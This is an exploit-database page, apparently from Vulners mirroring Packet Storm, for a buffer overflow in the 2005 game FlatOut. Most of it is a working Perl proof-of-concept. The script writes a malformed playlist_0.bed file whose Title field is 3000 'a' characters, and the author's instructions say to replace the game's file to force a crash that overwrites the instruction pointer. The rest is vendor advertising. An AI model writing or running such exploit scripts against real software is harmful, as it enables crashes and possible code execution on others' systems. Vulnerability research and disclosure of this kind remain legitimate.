Lucene search
K

Bugbear FlatOut 2005 Buffer Overflow

🗓️ 30 Nov 2011 00:00:00Reported by Silent DreamType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 28 Views

Buffer Overflow in FlatOut 2005 .bed Fil

Code
`#Exploit Title: FlatOut Malformed .bed file Buffer Overflow  
# Date: 11-29-11  
# Author: Silent Dream  
# Software Link: http://www.gog.com/en/gamecard/flatout  
# Version: Latest  
# Tested on: Windows 7  
  
#Tested on GOG.com copy of FlatOut. Exception offset = 61616161  
#Multiple .bed files are vulnerable to buffer overflows...too many to even begin to list..  
  
my $file = "playlist_0.bed";  
my $head = "Title = \"";  
my $junk = "a" x 3000 . "\"\r";  
my $tail = "Loop = {" . "\r}";  
open($File, ">$file");  
print $File $head.$junk.$tail;  
close($FILE);  
print "Overwrite the original playlist_0.bed file in %program files%\\GOG.com\\FlatOut\\data\\music and launch flatout.exe...wait for the crash\r\n";  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

30 Nov 2011 00:00Current
0.3Low risk
Vulners AI Score0.3
28